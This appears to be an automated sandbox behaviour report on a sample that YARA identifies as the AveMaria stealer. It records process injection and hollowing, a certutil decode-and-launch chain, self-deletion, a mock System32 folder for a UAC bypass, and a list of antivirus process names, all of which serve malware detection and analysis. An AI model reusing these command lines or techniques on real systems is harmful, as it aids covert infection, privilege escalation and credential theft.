Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED41E mov eax, dword ptr fs:[00000030h]	14_2_39CED41E
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED41E mov eax, dword ptr fs:[00000030h]	14_2_39CED41E
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED41E mov eax, dword ptr fs:[00000030h]	14_2_39CED41E
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B71F mov eax, dword ptr fs:[00000030h]	14_2_39D3B71F
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B71F mov eax, dword ptr fs:[00000030h]	14_2_39D3B71F
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED690 mov eax, dword ptr fs:[00000030h]	14_2_39CED690
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED690 mov eax, dword ptr fs:[00000030h]	14_2_39CED690
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3F650 mov eax, dword ptr fs:[00000030h]	14_2_39D3F650
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov eax, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov ecx, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov ecx, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC9B9 mov ecx, dword ptr fs:[00000030h]	14_2_39CEC9B9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D28BF0 mov ecx, dword ptr fs:[00000030h]	14_2_39D28BF0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D28BF0 mov ecx, dword ptr fs:[00000030h]	14_2_39D28BF0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3EB3B mov ecx, dword ptr fs:[00000030h]	14_2_39D3EB3B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3EB3B mov ecx, dword ptr fs:[00000030h]	14_2_39D3EB3B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3EB3B mov ecx, dword ptr fs:[00000030h]	14_2_39D3EB3B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3EB3B mov ecx, dword ptr fs:[00000030h]	14_2_39D3EB3B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3EB3B mov ecx, dword ptr fs:[00000030h]	14_2_39D3EB3B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3EB3B mov ecx, dword ptr fs:[00000030h]	14_2_39D3EB3B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CA10 mov eax, dword ptr fs:[00000030h]	14_2_39D3CA10
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CA10 mov eax, dword ptr fs:[00000030h]	14_2_39D3CA10
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CA10 mov eax, dword ptr fs:[00000030h]	14_2_39D3CA10
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CA10 mov ecx, dword ptr fs:[00000030h]	14_2_39D3CA10
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D24D30 mov eax, dword ptr fs:[00000030h]	14_2_39D24D30
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CCC6 mov eax, dword ptr fs:[00000030h]	14_2_39D3CCC6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CCC6 mov ecx, dword ptr fs:[00000030h]	14_2_39D3CCC6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CC01 mov eax, dword ptr fs:[00000030h]	14_2_39D3CC01
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CC01 mov ecx, dword ptr fs:[00000030h]	14_2_39D3CC01
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CE14 mov eax, dword ptr fs:[00000030h]	14_2_39D3CE14
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3CE14 mov eax, dword ptr fs:[00000030h]	14_2_39D3CE14
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D30146 mov eax, dword ptr fs:[00000030h]	14_2_39D30146
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C106 mov eax, dword ptr fs:[00000030h]	14_2_39D3C106
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C106 mov eax, dword ptr fs:[00000030h]	14_2_39D3C106
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3E0DD mov edx, dword ptr fs:[00000030h]	14_2_39D3E0DD
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3E0DD mov ecx, dword ptr fs:[00000030h]	14_2_39D3E0DD
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3E058 mov edx, dword ptr fs:[00000030h]	14_2_39D3E058
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C383 mov eax, dword ptr fs:[00000030h]	14_2_39D3C383
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C383 mov ecx, dword ptr fs:[00000030h]	14_2_39D3C383
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D403AB mov ecx, dword ptr fs:[00000030h]	14_2_39D403AB
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D403AB mov ecx, dword ptr fs:[00000030h]	14_2_39D403AB
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C304 mov eax, dword ptr fs:[00000030h]	14_2_39D3C304
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C304 mov ecx, dword ptr fs:[00000030h]	14_2_39D3C304
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C290 mov eax, dword ptr fs:[00000030h]	14_2_39D3C290
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3E2A6 mov ecx, dword ptr fs:[00000030h]	14_2_39D3E2A6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3E556 mov eax, dword ptr fs:[00000030h]	14_2_39D3E556
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C526 mov eax, dword ptr fs:[00000030h]	14_2_39D3C526
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C526 mov eax, dword ptr fs:[00000030h]	14_2_39D3C526
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C40C mov eax, dword ptr fs:[00000030h]	14_2_39D3C40C
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C40C mov ecx, dword ptr fs:[00000030h]	14_2_39D3C40C
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C7B6 mov eax, dword ptr fs:[00000030h]	14_2_39D3C7B6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C7B6 mov eax, dword ptr fs:[00000030h]	14_2_39D3C7B6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C68D mov eax, dword ptr fs:[00000030h]	14_2_39D3C68D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C68D mov eax, dword ptr fs:[00000030h]	14_2_39D3C68D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C68D mov eax, dword ptr fs:[00000030h]	14_2_39D3C68D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C68D mov eax, dword ptr fs:[00000030h]	14_2_39D3C68D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3C610 mov eax, dword ptr fs:[00000030h]	14_2_39D3C610
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0041E172 mov eax, dword ptr fs:[00000030h]	25_1_0041E172
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_004143ED mov eax, dword ptr fs:[00000030h]	25_1_004143ED
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_004143F4 mov eax, dword ptr fs:[00000030h]	25_1_004143F4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0041471F mov eax, dword ptr fs:[00000030h]	25_1_0041471F

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00406F66 GetProcessHeap,RtlFreeHeap,

14_2_00406F66

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\Public\pointer.com	Memory allocated: C:\Users\Public\Libraries\dbkyovyK.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: C:\Users\Public\Libraries\dbkyovyK.pif base: 18020000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: C:\Users\Public\Libraries\dbkyovyK.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: C:\Users\Public\Libraries\dbkyovyK.pif base: 18020000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: C:\Users\Public\Libraries\dbkyovyK.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: C:\Users\Public\Libraries\dbkyovyK.pif base: 120D0000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00409BFF OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,	14_2_00409BFF
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00415FE0 RegSetValueExA,OpenProcess,GetCurrentProcessId,EntryPoint,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,RegSetValueExA,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	14_2_00415FE0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00409BFF OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,	25_1_00409BFF
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00415FE0 RegSetValueExA,OpenProcess,GetCurrentProcessId,EntryPoint,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,RegSetValueExA,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	25_1_00415FE0

Sample uses process hollowing technique

Source: C:\Users\Public\pointer.com	Section unmapped: C:\Users\Public\Libraries\dbkyovyK.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Section unmapped: C:\Users\Public\Libraries\dbkyovyK.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Section unmapped: C:\Users\Public\Libraries\dbkyovyK.pif base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\Public\pointer.com	Memory written: C:\Users\Public\Libraries\dbkyovyK.pif base: 24E008	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory written: C:\Users\Public\Libraries\dbkyovyK.pif base: 34E008	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory written: C:\Users\Public\Libraries\dbkyovyK.pif base: 232008	Jump to behavior

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe		14_2_004160C3
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe		25_1_004160C3

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39D32B70 keybd_event,

14_2_39D32B70

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39D32BC0 mouse_event,

14_2_39D32BC0

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\Public\pointer.com" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decodehex "C:\Users\user\Desktop\PRODUCT.bat" "C:\Users\Public\pointer.com" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c start C:\Users\Public\pointer.com	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\pointer.com C:\Users\Public\pointer.com	Jump to behavior
Source: C:\Users\Public\pointer.com	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif	Jump to behavior

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00415774 CharLowerW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

14_2_00415774

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00413248 AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

14_2_00413248

Source: dbkyovyK.pif, 0000000E.00000002.2903547119.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2903547119.000000002FE0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dbkyovyK.pif, dbkyovyK.pif, 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2906644486.00000000374A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: dbkyovyK.pif, 0000000E.00000002.2903547119.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managere
Source: dbkyovyK.pif, 0000000E.00000002.2906598063.000000003749F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: I7RProgram Manager
Source: dbkyovyK.pif, 0000000E.00000002.2903547119.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerM
Source: 06-02-2024_08.48.06.14.dr	Binary or memory string: {Program Manager}
Source: dbkyovyK.pif, 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: 4C:\Users\user\AppData\Local\Microsoft Vision\06-02-2024_08.48.06{Program Manager}
Source: dbkyovyK.pif, dbkyovyK.pif, 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2906644486.00000000374A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_004135D1 cpuid

14_2_004135D1

Source: C:\Users\Public\pointer.com	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	8_2_02D15DDC
Source: C:\Users\Public\pointer.com	Code function: GetLocaleInfoA,	8_2_02D1B8D4
Source: C:\Users\Public\pointer.com	Code function: GetLocaleInfoA,	8_2_02D1B920
Source: C:\Users\Public\pointer.com	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	8_2_02D15EE8
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	26_2_02E55DDC
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: GetLocaleInfoA,	26_2_02E5B920
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	26_2_02E55EE7

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D1A31C GetLocalTime,

8_2_02D1A31C

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D795F8 GetVersion,

8_2_02D795F8

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Increases the number of concurrent connection per server for Internet Explorer

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: cmdagent.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: quhlpsvc.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: avgamsvr.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: TMBMSRV.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: Vsserv.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: avgupsvc.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: avgemc.exe
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, netutils.dll.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
